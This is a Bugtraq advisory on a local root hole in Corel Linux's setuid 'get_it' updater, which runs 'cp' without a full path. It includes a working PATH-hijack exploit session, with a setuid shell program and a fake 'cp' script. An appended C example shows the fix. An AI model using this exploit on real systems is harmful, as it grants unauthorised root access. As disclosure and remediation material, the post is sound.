Bugtraq mailing list archives
Serious Bug in Corel Linux.(Local root exploit)
From: tascon () ENETE GUI UVA ES (tascon () ENETE GUI UVA ES)
Date: Wed, 12 Jan 2000 09:26:49 +0100
Corel Linux comes with a program called "Corel Update" to manage the ".deb" files. This X-oriented program is setuid root. The program is "get_it" and it's located in the /usr/X11R6/bin directory. If you can run it, it's easy to get root privileges in your system.

It copies two files to the temp directory, taking no care to verify how. In fact, it calls the "cp" program WITHOUT THE WHOLE PATH!! The only thing you have to do to hack root is to change your PATH to execute your personal copy of the program.

Let's see the example.

------------------------------ From here --------------------------------
Script started on Wed Jan 12 01:58:17 2000
CorelLinux:~$ id
uid=1001(tascon) gid=1001(tascon) groups=1001(tascon)
CorelLinux:~$ cat misu.c
#include <stdio.h>
#include <unistd.h>

main(argc,argv)
int argc;
char **argv;
{
  if (argc==2);
    setuid(atoi(argv[1]));
  execlp("/bin/bash","/bin/bash",NULL);
}
CorelLinux:~$ cc -o misu misu.c
CorelLinux:~$ pwd
/home/tascon
CorelLinux:~$ cat cp
echo $1 $2 $3
/home/tascon/misu 0
CorelLinux:~$ export PATH=.:$PATH
CorelLinux:~$ get_it
/usr/X11R6/share/apps/get_it/html/largebanner.html /tmp/Get_It.0.a05872
CorelLinux:~# id
uid=0(root) gid=1001(tascon) groups=1001(tascon)
CorelLinux:~# exit
exit
/usr/X11R6/share/apps/get_it/html/smallbanner.html /tmp/Get_It.1.a05872
CorelLinux:~# id
uid=0(root) gid=1001(tascon) groups=1001(tascon)
Script done on Wed Jan 12 01:59:12 2000
---------------------------- To Here -----------------------------------

Easy to patch, isn't it?

*****************************************************************************
/ Cesar Tascon Alvarez          ( to ) ? be : !be                          /
/ University of Valladolid                                                 /
/ (Spain)                       W. Shakespeare                             /
/ tascon () gui uva es                                                     /
*****************************************************************************
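The patch the post alludes to ("Easy to patch, isn't it?"), as an added example that is neither the post's code nor Corel's get_it: a privileged helper that runs cp only through an absolute path from a fixed directory list and with a constructed environment, so the invoking user's PATH is never consulted. The function names, the SAFE_PATH list and the self-check's temporary files are assumptions made for this example.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#define SAFE_PATH "/bin:/usr/bin"   /* fixed search list; caller's PATH is never used */

/* Resolve a bare command name (no '/') to an absolute path under SAFE_PATH.
 * Returns 0 and fills out on success, -1 otherwise. */
int resolve_trusted(const char *cmd, char *out, size_t outlen) {
    char dirs[] = SAFE_PATH;
    if (strchr(cmd, '/') != NULL) return -1;
    for (char *d = strtok(dirs, ":"); d != NULL; d = strtok(NULL, ":")) {
        snprintf(out, outlen, "%s/%s", d, cmd);
        if (access(out, X_OK) == 0) return 0;
    }
    return -1;
}

/* Copy src to dst by exec'ing cp through its absolute path with a minimal,
 * constructed environment, so PATH, IFS, LD_PRELOAD etc. inherited from the
 * invoking user cannot redirect the call. Returns cp's exit status or -1. */
int safe_copy(const char *src, const char *dst) {
    char exe[256];
    if (resolve_trusted("cp", exe, sizeof exe) != 0) return -1;
    char *const argv[] = { "cp", (char *)src, (char *)dst, NULL };
    char *const envp[] = { "PATH=" SAFE_PATH, NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execve(exe, argv, envp); _exit(127); }  /* child: execve returns only on failure */
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}
/* Self-check: write a constructed file, poison PATH the way the post does, and
 * confirm the copy still runs the trusted cp. Returns 1 if contents match, else 0. */
int demo_copy_roundtrip(void) {
    char src[] = "/tmp/safe_copy_src.XXXXXX", dst[] = "/tmp/safe_copy_dst.XXXXXX";
    const char *payload = "constructed sample data\n";
    int sfd = mkstemp(src), dfd = mkstemp(dst);
    if (sfd < 0 || dfd < 0) return 0;
    if (write(sfd, payload, strlen(payload)) < 0) return 0;
    close(sfd); close(dfd);
    setenv("PATH", ".", 1);                  /* untrusted PATH, as in the post */
    int ok = safe_copy(src, dst) == 0;
    char buf[64] = {0}; FILE *f = fopen(dst, "r");
    if (f) { fread(buf, 1, sizeof buf - 1, f); fclose(f); }
    unlink(src); unlink(dst);
    return ok && strcmp(buf, payload) == 0;
}
```

Dropping privileges before the exec, or avoiding the external cp altogether by copying the file in-process, would narrow the helper's attack surface further; the environment scrubbing shown here is the minimum that closes the PATH hole the post describes.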